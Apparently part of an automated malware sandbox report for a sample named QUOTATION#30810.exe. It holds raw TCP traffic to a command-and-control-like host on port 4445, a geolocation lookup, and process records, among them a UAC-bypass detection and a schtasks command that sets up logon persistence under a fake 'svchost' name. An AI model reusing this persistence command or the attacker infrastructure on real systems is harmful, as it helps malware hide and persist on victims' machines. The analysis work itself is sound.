May 3, 2024 13:13:44.473124981 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473130941 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473151922 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473154068 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473166943 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473186016 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473196030 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473200083 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473227024 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473263979 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473278999 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473309994 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473309994 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473351002 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473380089 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473412037 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473426104 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473437071 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473449945 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473476887 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473476887 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473521948 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473558903 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473572016 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473592043 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473606110 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473634005 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473639011 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473658085 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473695993 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473702908 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473716021 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473732948 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473746061 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473754883 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473771095 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473818064 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473830938 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473841906 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473865986 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473896027 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473896027 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473910093 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473949909 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473957062 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473963976 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473977089 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473989964 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474031925 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474031925 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474035025 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474061012 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474102020 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474103928 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474147081 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474159956 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474212885 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474214077 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474237919 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474261045 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474296093 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474340916 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474368095 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474381924 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474423885 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474436998 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474447966 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474457026 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474474907 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474488020 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474529028 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474551916 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474551916 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474553108 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474567890 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474591970 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474597931 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474608898 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474617004 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474641085 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474658012 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474664927 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474699020 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474715948 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474729061 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474745989 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474782944 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474811077 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474829912 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474829912 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474901915 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474915028 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474960089 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.474963903 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474977016 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.474988937 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.475022078 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.475022078 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.566448927 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566466093 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566478014 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566517115 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566574097 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.566574097 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.566585064 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566598892 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566617966 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566632032 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566662073 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566664934 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.566692114 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566699982 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.566706896 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566755056 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566756010 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.566768885 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566804886 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.566824913 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566868067 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.566876888 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566893101 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566934109 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.566961050 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.566991091 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567028046 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567039967 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567053080 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567065954 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567070961 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567097902 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567122936 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567133904 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567133904 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567192078 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567204952 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567215919 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567260027 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567290068 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567305088 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567317009 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567332029 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567343950 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567348003 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567368984 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567408085 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567450047 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567466974 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567491055 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567497969 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567523003 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567536116 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567558050 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567565918 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567565918 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567572117 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567596912 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567621946 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567665100 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567668915 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567692995 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567732096 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567737103 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567745924 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567787886 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567809105 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567821980 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567835093 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567859888 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567868948 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567902088 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567909956 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567914009 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567926884 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.567958117 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.567970991 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568021059 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568027020 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.568036079 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568061113 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568075895 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.568139076 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568151951 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568183899 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.568191051 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568238974 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568252087 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568259001 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.568289042 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568306923 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.568348885 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568362951 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568392038 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.568417072 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568449974 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568471909 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.568510056 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568525076 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568541050 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568552017 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.568556070 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568583012 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.568608046 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568620920 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568645000 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568676949 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.568676949 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.568701029 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568772078 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568802118 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.568819046 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.696338892 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:45.344784021 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:13:45.513029099 CEST	80	49717	178.237.33.50	192.168.2.8
May 3, 2024 13:13:45.513231993 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:13:49.265510082 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:13:49.438340902 CEST	80	49717	178.237.33.50	192.168.2.8
May 3, 2024 13:13:49.438417912 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:13:49.556716919 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:49.706957102 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:13:50.438643932 CEST	80	49717	178.237.33.50	192.168.2.8
May 3, 2024 13:13:50.439116955 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:13:53.940680027 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:54.037206888 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:54.037220955 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:54.037233114 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:54.037276030 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:54.134329081 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:54.134444952 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:54.145247936 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:54.145309925 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:14:08.381800890 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:14:08.383910894 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:14:08.534854889 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:14:38.447671890 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:14:38.449346066 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:14:38.597378016 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:15:08.554042101 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:15:08.556905985 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:15:08.706794977 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:15:34.993132114 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:15:35.461528063 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:15:36.445913076 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:15:38.352174044 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:15:38.620752096 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:15:38.622376919 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:15:38.769025087 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:15:41.945914030 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:15:48.945930004 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:16:02.945899010 CEST	49717	80	192.168.2.8	178.237.33.50
May 3, 2024 13:16:08.720498085 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:16:08.722611904 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:16:08.863428116 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:16:39.548372984 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:16:39.633308887 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:16:39.718594074 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:16:39.863523960 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:17:09.595791101 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:17:09.640934944 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:17:09.784871101 CEST	4445	49708	172.245.208.13	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2024 13:13:45.043447018 CEST	60801	53	192.168.2.8	1.1.1.1
May 3, 2024 13:13:45.133033991 CEST	53	60801	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 3, 2024 13:13:45.043447018 CEST	192.168.2.8	1.1.1.1	0xc93	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 3, 2024 13:13:45.133033991 CEST	1.1.1.1	192.168.2.8	0xc93	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49717	178.237.33.50	80	4360	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 13:13:49.265510082 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
May 3, 2024 13:13:49.438340902 CEST	1173	IN	HTTP/1.1 200 OK date: Fri, 03 May 2024 11:13:49 GMT server: Apache content-length: 965 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED] Data Ascii: { "geoplugin_request":"191.96.227.219", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

Target ID:	0
Start time:	13:13:21
Start date:	03/05/2024
Path:	C:\Users\user\Desktop\QUOTATION#30810.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\QUOTATION#30810.exe"
Imagebase:	0x1fcf8300000
File size:	948'209 bytes
MD5 hash:	C828227DB6D7BC08DD8E9B7313A0E770
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1595193809.000001FC8003B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:13:21
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:13:26
Start date:	03/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
Imagebase:	0x7ff726b60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:13:26
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:13:26
Start date:	03/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat""
Imagebase:	0x7ff726b60000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:13:26
Start date:	03/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	13:13:26
Start date:	03/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
